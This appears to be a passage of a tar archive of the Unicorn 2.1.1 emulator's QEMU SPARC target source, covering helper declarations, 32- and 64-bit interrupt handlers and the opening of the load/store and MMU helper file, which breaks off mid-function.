DEF_HELPER_FLAGS_1(flushw, TCG_CALL_NO_WG, void, env) DEF_HELPER_FLAGS_1(saved, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(restored, TCG_CALL_NO_RWG, void, env) DEF_HELPER_1(rdccr, tl, env) DEF_HELPER_2(wrccr, void, env, tl) DEF_HELPER_1(rdcwp, tl, env) DEF_HELPER_2(wrcwp, void, env, tl) DEF_HELPER_FLAGS_2(array8, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(set_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(clear_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(write_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(tick_set_count, TCG_CALL_NO_RWG, void, ptr, i64) DEF_HELPER_FLAGS_3(tick_get_count, TCG_CALL_NO_WG, i64, env, ptr, int) DEF_HELPER_FLAGS_2(tick_set_limit, TCG_CALL_NO_RWG, void, ptr, i64) #endif DEF_HELPER_FLAGS_3(check_align, TCG_CALL_NO_WG, void, env, tl, i32) DEF_HELPER_1(debug, void, env) DEF_HELPER_1(save, void, env) DEF_HELPER_1(restore, void, env) DEF_HELPER_3(udiv, tl, env, tl, tl) DEF_HELPER_3(udiv_cc, tl, env, tl, tl) DEF_HELPER_3(sdiv, tl, env, tl, tl) DEF_HELPER_3(sdiv_cc, tl, env, tl, tl) DEF_HELPER_3(taddcctv, tl, env, tl, tl) DEF_HELPER_3(tsubcctv, tl, env, tl, tl) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_3(sdivx, TCG_CALL_NO_WG, s64, env, s64, s64) DEF_HELPER_FLAGS_3(udivx, TCG_CALL_NO_WG, i64, env, i64, i64) #endif DEF_HELPER_FLAGS_4(ld_asi, TCG_CALL_NO_WG, i64, env, tl, int, i32) DEF_HELPER_FLAGS_5(st_asi, TCG_CALL_NO_WG, void, env, tl, i64, int, i32) DEF_HELPER_FLAGS_1(check_ieee_exceptions, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_3(ldfsr, TCG_CALL_NO_RWG, tl, env, tl, i32) DEF_HELPER_FLAGS_1(fabss, TCG_CALL_NO_RWG_SE, f32, f32) DEF_HELPER_FLAGS_2(fsqrts, TCG_CALL_NO_RWG, f32, env, f32) DEF_HELPER_FLAGS_2(fsqrtd, TCG_CALL_NO_RWG, f64, env, f64) DEF_HELPER_FLAGS_3(fcmps, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpd, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpes, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmped, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_1(fsqrtq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(fcmpq, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq, TCG_CALL_NO_WG, tl, env) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_3(ldxfsr, TCG_CALL_NO_RWG, tl, env, tl, i64) DEF_HELPER_FLAGS_1(fabsd, TCG_CALL_NO_RWG_SE, f64, f64) DEF_HELPER_FLAGS_3(fcmps_fcc1, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmps_fcc2, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmps_fcc3, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpd_fcc1, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpd_fcc2, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpd_fcc3, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpes_fcc1, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpes_fcc2, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpes_fcc3, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmped_fcc1, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmped_fcc2, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmped_fcc3, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_1(fabsq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(fcmpq_fcc1, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpq_fcc2, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpq_fcc3, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc1, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc2, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc3, TCG_CALL_NO_WG, tl, env) #endif DEF_HELPER_2(raise_exception, noreturn, env, int) #define F_HELPER_0_1(name) \ DEF_HELPER_FLAGS_1(f ## name, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_3(faddd, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fsubd, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fmuld, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fdivd, TCG_CALL_NO_RWG, f64, env, f64, f64) F_HELPER_0_1(addq) F_HELPER_0_1(subq) F_HELPER_0_1(mulq) F_HELPER_0_1(divq) DEF_HELPER_FLAGS_3(fadds, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fsubs, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fmuls, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fdivs, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fsmuld, TCG_CALL_NO_RWG, f64, env, f32, f32) DEF_HELPER_FLAGS_3(fdmulq, TCG_CALL_NO_RWG, void, env, f64, f64) DEF_HELPER_FLAGS_1(fnegs, TCG_CALL_NO_RWG_SE, f32, f32) DEF_HELPER_FLAGS_2(fitod, TCG_CALL_NO_RWG_SE, f64, env, s32) DEF_HELPER_FLAGS_2(fitoq, TCG_CALL_NO_RWG, void, env, s32) DEF_HELPER_FLAGS_2(fitos, TCG_CALL_NO_RWG, f32, env, s32) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_1(fnegd, TCG_CALL_NO_RWG_SE, f64, f64) DEF_HELPER_FLAGS_1(fnegq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(fxtos, TCG_CALL_NO_RWG, f32, env, s64) DEF_HELPER_FLAGS_2(fxtod, TCG_CALL_NO_RWG, f64, env, s64) DEF_HELPER_FLAGS_2(fxtoq, TCG_CALL_NO_RWG, void, env, s64) #endif DEF_HELPER_FLAGS_2(fdtos, TCG_CALL_NO_RWG, f32, env, f64) DEF_HELPER_FLAGS_2(fstod, TCG_CALL_NO_RWG, f64, env, f32) DEF_HELPER_FLAGS_1(fqtos, TCG_CALL_NO_RWG, f32, env) DEF_HELPER_FLAGS_2(fstoq, TCG_CALL_NO_RWG, void, env, f32) DEF_HELPER_FLAGS_1(fqtod, TCG_CALL_NO_RWG, f64, env) DEF_HELPER_FLAGS_2(fdtoq, TCG_CALL_NO_RWG, void, env, f64) DEF_HELPER_FLAGS_2(fstoi, TCG_CALL_NO_RWG, s32, env, f32) DEF_HELPER_FLAGS_2(fdtoi, TCG_CALL_NO_RWG, s32, env, f64) DEF_HELPER_FLAGS_1(fqtoi, TCG_CALL_NO_RWG, s32, env) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_2(fstox, TCG_CALL_NO_RWG, s64, env, f32) DEF_HELPER_FLAGS_2(fdtox, TCG_CALL_NO_RWG, s64, env, f64) DEF_HELPER_FLAGS_1(fqtox, TCG_CALL_NO_RWG, s64, env) DEF_HELPER_FLAGS_2(fpmerge, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16al, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16au, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmuld8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmuld8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fexpand, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_3(pdist, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) DEF_HELPER_FLAGS_2(fpack16, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_3(fpack32, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) DEF_HELPER_FLAGS_2(fpackfix, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_3(bshuffle, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) #define VIS_HELPER(name) \ DEF_HELPER_FLAGS_2(f ## name ## 16, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f ## name ## 16s, TCG_CALL_NO_RWG_SE, \ i32, i32, i32) \ DEF_HELPER_FLAGS_2(f ## name ## 32, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f ## name ## 32s, TCG_CALL_NO_RWG_SE, \ i32, i32, i32) VIS_HELPER(padd) VIS_HELPER(psub) #define VIS_CMPHELPER(name) \ DEF_HELPER_FLAGS_2(f##name##16, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) \ DEF_HELPER_FLAGS_2(f##name##32, TCG_CALL_NO_RWG_SE, \ i64, i64, i64) VIS_CMPHELPER(cmpgt) VIS_CMPHELPER(cmpeq) VIS_CMPHELPER(cmple) VIS_CMPHELPER(cmpne) #endif #undef F_HELPER_0_1 #undef VIS_HELPER #undef VIS_CMPHELPER DEF_HELPER_1(compute_psr, void, env) DEF_HELPER_FLAGS_1(compute_C_icc, TCG_CALL_NO_WG_SE, i32, env) �������������������unicorn-2.1.1/qemu/target/sparc/int32_helper.c������������������������������������������������������0000664�0000000�0000000�00000005461�14675241067�0021221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Sparc32 interrupt helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" //#include "sysemu/runstate.h" void sparc_cpu_do_interrupt(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; int cwp, intno = cs->exception_index; /* Compute PSR before exposing state. */ if (env->cc_op != CC_OP_FLAGS) { cpu_get_psr(env); } if (env->psret == 0) { if (cs->exception_index == 0x80 && env->def.features & CPU_FEATURE_TA0_SHUTDOWN) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } else { cpu_abort(cs, "Trap 0x%02x while interrupts disabled, Error state", cs->exception_index); } return; } env->psret = 0; cwp = cpu_cwp_dec(env, env->cwp - 1); cpu_set_cwp(env, cwp); env->regwptr[9] = env->pc; env->regwptr[10] = env->npc; env->psrps = env->psrs; env->psrs = 1; env->tbr = (env->tbr & TBR_BASE_MASK) | (intno << 4); env->pc = env->tbr; env->npc = env->pc + 4; cs->exception_index = -1; /* IRQ acknowledgment */ if ((intno & ~15) == TT_EXTINT && env->qemu_irq_ack != NULL) { env->qemu_irq_ack(env, env->irq_manager, intno); } } static void leon3_cache_control_int(CPUSPARCState *env) { uint32_t state = 0; if (env->cache_control & CACHE_CTRL_IF) { /* Instruction cache state */ state = env->cache_control & CACHE_STATE_MASK; if (state == CACHE_ENABLED) { state = CACHE_FROZEN; } env->cache_control &= ~CACHE_STATE_MASK; env->cache_control |= state; } if (env->cache_control & CACHE_CTRL_DF) { /* Data cache state */ state = (env->cache_control >> 2) & CACHE_STATE_MASK; if (state == CACHE_ENABLED) { state = CACHE_FROZEN; } env->cache_control &= ~(CACHE_STATE_MASK << 2); env->cache_control |= (state << 2); } } void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno) { // leon3_irq_ack(irq_manager, intno); leon3_cache_control_int(env); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/int64_helper.c������������������������������������������������������0000664�0000000�0000000�00000011536�14675241067�0021226�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Sparc64 interrupt helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" void sparc_cpu_do_interrupt(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; int intno = cs->exception_index; trap_state *tsptr; /* Compute PSR before exposing state. */ if (env->cc_op != CC_OP_FLAGS) { cpu_get_psr(env); } if (env->tl >= env->maxtl) { cpu_abort(cs, "Trap 0x%04x while trap level (%d) >= MAXTL (%d)," " Error state", cs->exception_index, env->tl, env->maxtl); return; } if (env->tl < env->maxtl - 1) { env->tl++; } else { env->pstate |= PS_RED; if (env->tl < env->maxtl) { env->tl++; } } tsptr = cpu_tsptr(env); tsptr->tstate = (cpu_get_ccr(env) << 32) | ((env->asi & 0xff) << 24) | ((env->pstate & 0xf3f) << 8) | cpu_get_cwp64(env); tsptr->tpc = env->pc; tsptr->tnpc = env->npc; tsptr->tt = intno; if (cpu_has_hypervisor(env)) { env->htstate[env->tl] = env->hpstate; /* XXX OpenSPARC T1 - UltraSPARC T3 have MAXPTL=2 but this may change in the future */ if (env->tl > 2) { env->hpstate |= HS_PRIV; } } if (env->def.features & CPU_FEATURE_GL) { tsptr->tstate |= (env->gl & 7ULL) << 40; cpu_gl_switch_gregs(env, env->gl + 1); env->gl++; } switch (intno) { case TT_IVEC: if (!cpu_has_hypervisor(env)) { cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_IG); } break; case TT_TFAULT: case TT_DFAULT: case TT_TMISS: case TT_TMISS + 1: case TT_TMISS + 2: case TT_TMISS + 3: case TT_DMISS: case TT_DMISS + 1: case TT_DMISS + 2: case TT_DMISS + 3: case TT_DPROT: case TT_DPROT + 1: case TT_DPROT + 2: case TT_DPROT + 3: if (cpu_has_hypervisor(env)) { env->hpstate |= HS_PRIV; env->pstate = PS_PEF | PS_PRIV; } else { cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_MG); } break; // case TT_INSN_REAL_TRANSLATION_MISS ... TT_DATA_REAL_TRANSLATION_MISS: // case TT_HTRAP ... TT_HTRAP + 127: // env->hpstate |= HS_PRIV; // break; default: if (intno >= TT_INSN_REAL_TRANSLATION_MISS && intno <= TT_DATA_REAL_TRANSLATION_MISS) { env->hpstate |= HS_PRIV; break; } if (intno >= TT_HTRAP && intno <= TT_HTRAP + 127) { env->hpstate |= HS_PRIV; break; } cpu_change_pstate(env, PS_PEF | PS_PRIV | PS_AG); break; } if (intno == TT_CLRWIN) { cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - 1)); } else if ((intno & 0x1c0) == TT_SPILL) { cpu_set_cwp(env, cpu_cwp_dec(env, env->cwp - env->cansave - 2)); } else if ((intno & 0x1c0) == TT_FILL) { cpu_set_cwp(env, cpu_cwp_inc(env, env->cwp + 1)); } if (cpu_hypervisor_mode(env)) { env->pc = (env->htba & ~0x3fffULL) | (intno << 5); } else { env->pc = env->tbr & ~0x7fffULL; env->pc |= ((env->tl > 1) ? 1 << 14 : 0) | (intno << 5); } env->npc = env->pc + 4; cs->exception_index = -1; } trap_state *cpu_tsptr(CPUSPARCState* env) { return &env->ts[env->tl & MAXTL_MASK]; } static bool do_modify_softint(CPUSPARCState *env, uint32_t value) { if (env->softint != value) { env->softint = value; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } return true; } return false; } void helper_set_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, env->softint | (uint32_t)value)) { // trace_int_helper_set_softint(env->softint); } } void helper_clear_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, env->softint & (uint32_t)~value)) { // trace_int_helper_clear_softint(env->softint); } } void helper_write_softint(CPUSPARCState *env, uint64_t value) { if (do_modify_softint(env, (uint32_t)value)) { // trace_int_helper_write_softint(env->softint); } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/ldst_helper.c�������������������������������������������������������0000664�0000000�0000000�00000200666�14675241067�0021234�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for loads and stores * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "tcg/tcg.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "asi.h" //#define DEBUG_MMU //#define DEBUG_MXCC //#define DEBUG_UNALIGNED //#define DEBUG_UNASSIGNED //#define DEBUG_ASI //#define DEBUG_CACHE_CONTROL #ifdef DEBUG_MMU #define DPRINTF_MMU(fmt, ...) \ do { printf("MMU: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_MMU(fmt, ...) do {} while (0) #endif #ifdef DEBUG_MXCC #define DPRINTF_MXCC(fmt, ...) \ do { printf("MXCC: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_MXCC(fmt, ...) do {} while (0) #endif #ifdef DEBUG_ASI #define DPRINTF_ASI(fmt, ...) \ do { printf("ASI: " fmt , ## __VA_ARGS__); } while (0) #endif #ifdef DEBUG_CACHE_CONTROL #define DPRINTF_CACHE_CONTROL(fmt, ...) \ do { printf("CACHE_CONTROL: " fmt , ## __VA_ARGS__); } while (0) #else #define DPRINTF_CACHE_CONTROL(fmt, ...) do {} while (0) #endif #ifdef TARGET_SPARC64 #ifndef TARGET_ABI32 #define AM_CHECK(env1) ((env1)->pstate & PS_AM) #else #define AM_CHECK(env1) (1) #endif #endif #define QT0 (env->qt0) #define QT1 (env->qt1) #if defined(TARGET_SPARC64) /* Calculates TSB pointer value for fault page size * UltraSPARC IIi has fixed sizes (8k or 64k) for the page pointers * UA2005 holds the page size configuration in mmu_ctx registers */ static uint64_t ultrasparc_tsb_pointer(CPUSPARCState *env, const SparcV9MMU *mmu, const int idx) { uint64_t tsb_register; int page_size; if (cpu_has_hypervisor(env)) { int tsb_index = 0; int ctx = mmu->tag_access & 0x1fffULL; uint64_t ctx_register = mmu->sun4v_ctx_config[ctx ? 1 : 0]; tsb_index = idx; tsb_index |= ctx ? 2 : 0; page_size = idx ? ctx_register >> 8 : ctx_register; page_size &= 7; tsb_register = mmu->sun4v_tsb_pointers[tsb_index]; } else { page_size = idx; tsb_register = mmu->tsb; } int tsb_split = (tsb_register & 0x1000ULL) ? 1 : 0; int tsb_size = tsb_register & 0xf; uint64_t tsb_base_mask = (~0x1fffULL) << tsb_size; /* move va bits to correct position, * the context bits will be masked out later */ uint64_t va = mmu->tag_access >> (3 * page_size + 9); /* calculate tsb_base mask and adjust va if split is in use */ if (tsb_split) { if (idx == 0) { va &= ~(1ULL << (13 + tsb_size)); } else { va |= (1ULL << (13 + tsb_size)); } tsb_base_mask <<= 1; } return ((tsb_register & tsb_base_mask) | (va & ~tsb_base_mask)) & ~0xfULL; } /* Calculates tag target register value by reordering bits in tag access register */ static uint64_t ultrasparc_tag_target(uint64_t tag_access_register) { return ((tag_access_register & 0x1fff) << 48) | (tag_access_register >> 22); } static void replace_tlb_entry(SparcTLBEntry *tlb, uint64_t tlb_tag, uint64_t tlb_tte, CPUSPARCState *env) { target_ulong mask, size, va, offset; /* flush page range if translation is valid */ if (TTE_IS_VALID(tlb->tte)) { CPUState *cs = env_cpu(env); size = 8192ULL << 3 * TTE_PGSIZE(tlb->tte); mask = 1ULL + ~size; va = tlb->tag & mask; for (offset = 0; offset < size; offset += TARGET_PAGE_SIZE) { tlb_flush_page(cs, va + offset); } } tlb->tag = tlb_tag; tlb->tte = tlb_tte; } static void demap_tlb(SparcTLBEntry *tlb, target_ulong demap_addr, const char *strmmu, CPUSPARCState *env1) { unsigned int i; target_ulong mask; uint64_t context; int is_demap_context = (demap_addr >> 6) & 1; /* demap context */ switch ((demap_addr >> 4) & 3) { case 0: /* primary */ context = env1->dmmu.mmu_primary_context; break; case 1: /* secondary */ context = env1->dmmu.mmu_secondary_context; break; case 2: /* nucleus */ context = 0; break; case 3: /* reserved */ default: return; } for (i = 0; i < 64; i++) { if (TTE_IS_VALID(tlb[i].tte)) { if (is_demap_context) { /* will remove non-global entries matching context value */ if (TTE_IS_GLOBAL(tlb[i].tte) || !tlb_compare_context(&tlb[i], context)) { continue; } } else { /* demap page will remove any entry matching VA */ mask = 0xffffffffffffe000ULL; mask <<= 3 * ((tlb[i].tte >> 61) & 3); if (!compare_masked(demap_addr, tlb[i].tag, mask)) { continue; } /* entry should be global or matching context value */ if (!TTE_IS_GLOBAL(tlb[i].tte) && !tlb_compare_context(&tlb[i], context)) { continue; } } replace_tlb_entry(&tlb[i], 0, 0, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s demap invalidated entry [%02u]\n", strmmu, i); dump_mmu(env1); #endif } } } static uint64_t sun4v_tte_to_sun4u(CPUSPARCState *env, uint64_t tag, uint64_t sun4v_tte) { uint64_t sun4u_tte; if (!(cpu_has_hypervisor(env) && (tag & TLB_UST1_IS_SUN4V_BIT))) { /* is already in the sun4u format */ return sun4v_tte; } sun4u_tte = TTE_PA(sun4v_tte) | (sun4v_tte & TTE_VALID_BIT); sun4u_tte |= (sun4v_tte & 3ULL) << 61; /* TTE_PGSIZE */ sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_NFO_BIT_UA2005, TTE_NFO_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_USED_BIT_UA2005, TTE_USED_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_W_OK_BIT_UA2005, TTE_W_OK_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_SIDEEFFECT_BIT_UA2005, TTE_SIDEEFFECT_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_PRIV_BIT_UA2005, TTE_PRIV_BIT); sun4u_tte |= CONVERT_BIT(sun4v_tte, TTE_LOCKED_BIT_UA2005, TTE_LOCKED_BIT); return sun4u_tte; } static void replace_tlb_1bit_lru(SparcTLBEntry *tlb, uint64_t tlb_tag, uint64_t tlb_tte, const char *strmmu, CPUSPARCState *env1, uint64_t addr) { unsigned int i, replace_used; tlb_tte = sun4v_tte_to_sun4u(env1, addr, tlb_tte); if (cpu_has_hypervisor(env1)) { uint64_t new_vaddr = tlb_tag & ~0x1fffULL; uint64_t new_size = 8192ULL << 3 * TTE_PGSIZE(tlb_tte); uint32_t new_ctx = tlb_tag & 0x1fffU; for (i = 0; i < 64; i++) { uint32_t ctx = tlb[i].tag & 0x1fffU; /* check if new mapping overlaps an existing one */ if (new_ctx == ctx) { uint64_t vaddr = tlb[i].tag & ~0x1fffULL; uint64_t size = 8192ULL << 3 * TTE_PGSIZE(tlb[i].tte); if (new_vaddr == vaddr || (new_vaddr < vaddr + size && vaddr < new_vaddr + new_size)) { DPRINTF_MMU("auto demap entry [%d] %lx->%lx\n", i, vaddr, new_vaddr); replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); return; } } } } /* Try replacing invalid entry */ for (i = 0; i < 64; i++) { if (!TTE_IS_VALID(tlb[i].tte)) { replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replaced invalid entry [%i]\n", strmmu, i); dump_mmu(env1); #endif return; } } /* All entries are valid, try replacing unlocked entry */ for (replace_used = 0; replace_used < 2; ++replace_used) { /* Used entries are not replaced on first pass */ for (i = 0; i < 64; i++) { if (!TTE_IS_LOCKED(tlb[i].tte) && !TTE_IS_USED(tlb[i].tte)) { replace_tlb_entry(&tlb[i], tlb_tag, tlb_tte, env1); #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replaced unlocked %s entry [%i]\n", strmmu, (replace_used ? "used" : "unused"), i); dump_mmu(env1); #endif return; } } /* Now reset used bit and search for unused entries again */ for (i = 0; i < 64; i++) { TTE_SET_UNUSED(tlb[i].tte); } } #ifdef DEBUG_MMU DPRINTF_MMU("%s lru replacement: no free entries available, " "replacing the last one\n", strmmu); #endif /* corner case: the last entry is replaced anyway */ replace_tlb_entry(&tlb[63], tlb_tag, tlb_tte, env1); } #endif #ifdef TARGET_SPARC64 /* returns true if access using this ASI is to have address translated by MMU otherwise access is to raw physical address */ /* TODO: check sparc32 bits */ static inline int is_translating_asi(int asi) { /* Ultrasparc IIi translating asi - note this list is defined by cpu implementation */ #define XRANGE(x, a, b) (x >=a && x <= b) if (XRANGE(asi, 0x04, 0x11)) return 1; if (XRANGE(asi, 0x16, 0x19)) return 1; if (XRANGE(asi, 0x1E, 0x1F)) return 1; if (XRANGE(asi, 0x24, 0x2C)) return 1; if (XRANGE(asi, 0x70, 0x73)) return 1; if (XRANGE(asi, 0x78, 0x79)) return 1; if (XRANGE(asi, 0x80, 0xFF)) return 1; #undef XRANGE return 0; } static inline target_ulong address_mask(CPUSPARCState *env1, target_ulong addr) { if (AM_CHECK(env1)) { addr &= 0xffffffffULL; } return addr; } static inline target_ulong asi_address_mask(CPUSPARCState *env, int asi, target_ulong addr) { if (is_translating_asi(asi)) { addr = address_mask(env, addr); } return addr; } static inline void do_check_asi(CPUSPARCState *env, int asi, uintptr_t ra) { /* ASIs >= 0x80 are user mode. * ASIs >= 0x30 are hyper mode (or super if hyper is not available). * ASIs <= 0x2f are super mode. */ if (asi < 0x80 && !cpu_hypervisor_mode(env) && (!cpu_supervisor_mode(env) || (asi >= 0x30 && cpu_has_hypervisor(env)))) { cpu_raise_exception_ra(env, TT_PRIV_ACT, ra); } } #endif static void do_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align, uintptr_t ra) { if (addr & align) { #ifdef DEBUG_UNALIGNED printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx "\n", addr, env->pc); #endif cpu_raise_exception_ra(env, TT_UNALIGNED, ra); } } void helper_check_align(CPUSPARCState *env, target_ulong addr, uint32_t align) { do_check_align(env, addr, align, GETPC()); } #if !defined(TARGET_SPARC64) && defined(DEBUG_MXCC) static void dump_mxcc(CPUSPARCState *env) { printf("mxccdata: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n", env->mxccdata[0], env->mxccdata[1], env->mxccdata[2], env->mxccdata[3]); printf("mxccregs: %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n" " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 " %016" PRIx64 "\n", env->mxccregs[0], env->mxccregs[1], env->mxccregs[2], env->mxccregs[3], env->mxccregs[4], env->mxccregs[5], env->mxccregs[6], env->mxccregs[7]); } #endif #if defined(TARGET_SPARC64) && defined(DEBUG_ASI) static void dump_asi(const char *txt, target_ulong addr, int asi, int size, uint64_t r1) { switch (size) { case 1: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %02" PRIx64 "\n", txt, addr, asi, r1 & 0xff); break; case 2: DPRINTF_ASI("%s "TARGET_FMT_lx " asi 0x%02x = %04" PRIx64 "\n", txt, 